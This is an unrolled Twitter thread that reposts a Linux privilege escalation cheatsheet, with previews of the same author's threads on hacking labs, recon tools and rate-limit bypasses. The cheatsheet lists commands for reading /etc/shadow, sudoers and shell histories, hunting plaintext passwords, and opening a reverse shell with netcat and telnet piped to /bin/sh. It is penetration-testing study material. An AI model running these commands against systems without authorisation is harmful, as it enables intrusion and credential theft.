Lohitaksh Nandan Profile picture
Apr 28 β€’ 21 tweets β€’ 4 min read
The Linux Privilege Escalation Cheatsheet... :)

Credits ~ @g0tmi1k

πŸ‘‡πŸ»πŸ§΅

#cybersecurity #infosec #linux #hacking #redteam
Operating System
What's the distribution type? What version?

cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release

What's the kernel version? Is it 64-bit?

cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-
What can be learnt from the environmental variables?

cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Is there a printer?

lpstat -a
Applications & Services
What services are running? Which service has which user privilege?

ps aux
ps -ef
top
cat /etc/services
Which service(s) are been running by root? Of these services, which are vulnerable

ps aux | grep root
ps -ef | grep root
What applications are installed? What version are they? Are they currently running?

ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/
Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?

cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/

What jobs are scheduled?

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords?

grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla
Communications & Networking
What NIC(s) does the system have? Is it connected to another network?

/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network
What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?

cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname
What other users & hosts are communicating with the system?

lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w
Whats cached? IP and/or MAC addresses

arp -e
route
/sbin/route -nee

Is packet sniffing possible? What can be seen? Listen to live traffic

tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21

Note: tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
Have you got a shell? Can you interact with the system?

nc -lvp 4444 # Attacker. Input (Commands)
nc -lvp 4445 # Attacker. Ouput (Results)
telnet [attackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP!
Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?

id
who
w
last
cat /etc/passwd | cut -d: -f1 # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
sudo -l

What sensitive files can be found?

cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/
Anything "interesting" in the home directorie(s)? If it's possible to access

ls -ahlR /root/
ls -ahlR /home/
Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords

cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
What has the user being doing? Is there any password in plain text? What have they been edting?

cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
What user information can be found?

cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root
That's it for today's thread... :)

β€’ β€’ β€’

Missing some Tweet in this thread? You can try to force a refresh
γ€€

Keep Current with Lohitaksh Nandan

Lohitaksh Nandan Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @NandanLohitaksh

Apr 27
FREE LABS TO TEST YOUR PENTEST/CTF SKILLS :-)

Retweet this to let others know :)

#cybersecurity #infosec #pentesting
Academy Hackaflag BR - hackaflag.com.br
Attack-Defense - attackdefense.com
Alert to win - alf.nu/alert1
CTF Komodo Security - ctf.komodosec.com
CMD Challenge - cmdchallenge.com
Explotation Education - exploit.education
Google CTF - lnkd.in/e46drbz8
HackTheBox - hackthebox.com
Hackthis - hackthis.co.uk
Hacksplaining - lnkd.in/eAB5CSTA
Hacker101 - ctf.hacker101.com
Hacker Security - lnkd.in/ex7R-C-e
Hacking-Lab - hacking-lab.com
Read 7 tweets
Apr 23
Recon Tools for Web Application Pentesting... :)

Credits ~ Khalid Maina

A Thread πŸ§΅β†“

#cybersecurity #pentesting #bugbounty
Proxy

- burpsuite
- zap proxy

Subdomain

- subfinder
- assetfinder
- amass
- sublist3r
- dig
- chaos (chaos.projectdiscovery.io)

Webspidering

- gospider
- gau
- linkfinder
- waybackurls
- hakrawler
- paramspider

Directory/fuzzing

- ffuf
- wfuzz
- gobuster
- dirbuster
Fingerprinting

- wappalyzer
- builtwith
- netcraft
- whatweb
- wafw0f

Vulnerability

- nuclei
- wpscan
- nikto

Email

- mxtoolbox
- emkei
- anonymailer
- thunderbird

Exploit

- searchsploit
- exploitdb

Sensitive data

- trufflehog
- gitsecrets
Read 5 tweets
Mar 7
Websites/Platforms 🌐 to learn to hack πŸ•΅οΈ

βš—οΈCybersecurity training platform

β†’ Hackthebox
β†’ Hacxpert
β†’ Tryhackme
β†’ Pentester Lab
β†’ Vulnhub
β†’ Cybrary
β†’ CybersecLabs
β†’ Root Me
β†’ OverTheWire
β†’ Vulnmachines
β†’ RangeForce
β†’ certifiedsecure
β†’ EchoCTF
β†’ Try2Hack

thread
🌐Web Exploitation
β†’ Hackxpert
β†’ Portswigger Web Security Academy
β†’ Bug Bounty Hunter
β†’ Pentester Lab
β†’ application.security
β†’ OWASP Juice Shop
β†’ OWASP WebGoat
β†’ bWAPP
β†’ OWASP Broken Web Application
🏁CTF Based Learning
β†’ CTFTime
β†’ PicoCTF
β†’ 247CTF
β†’ Hackthissite
β†’ WeChall
β†’ W3challs
β†’ Hacker101
β†’ IO wargame
Read 8 tweets
Mar 7
7 Hacking Books you must read...

🧡

#cybersecurity #hacking
1/

1. Web Application Hackers Handbook

amazon.in/Web-Applicatio…
2/

2. Real-World Bug Hunting

amazon.in/Real-World-Bug…
Read 8 tweets
Mar 7
Roadmap for learning Android Development by @championswimmer

Thread Summary πŸ§΅πŸ‘‡
1. Expectations from an Android Developer
i. Android Engineer: Knows basics of programming, can work in android team.
ii. Senior Android Engineer: Knows UI-based development, can be responsible for a small app.
iii. Android Lead: Design + Architecture of complex apps.
2. OOPs Concepts
i. Interfaces, Abstract Classes
ii. Collection Framework - ArrayList, HashMap, Iterator
iii. Visibility (public/private/package) and Inheritance
iv. Exceptions, try-catch syntax
Read 17 tweets
Mar 7
Bypass Rate Limits in Web Applications and API's.

β€” What is Rate Limit

Rate limiting is a process to limiting the number of request an user can make to a web server in an span of time.

#web #api #rate #limit #bypass #bugbounty #bugbountytips #infosec #cybersecurity
This can be achieved by implementing IP based, Session Based rate limits on web server.

β€”Where to Look for Rate Limit Bugs

Place like :
β€” Login/Signup pages
β€” Register Pages
β€” 2FA codes
β€” Confirmation Codes
...and any other request which if bruteforce will allow attacker to achieve anything malicious should be check for "No Rate Limit" issue.

[Bypass 1] - Using Null Chars

%00, %0d%0a, %09, %0C, %20, %0
Read 11 tweets

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

:(